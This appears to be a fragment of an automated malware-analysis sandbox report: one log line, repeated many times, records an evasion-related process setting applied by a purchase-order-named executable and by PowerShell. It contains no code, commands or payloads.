                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
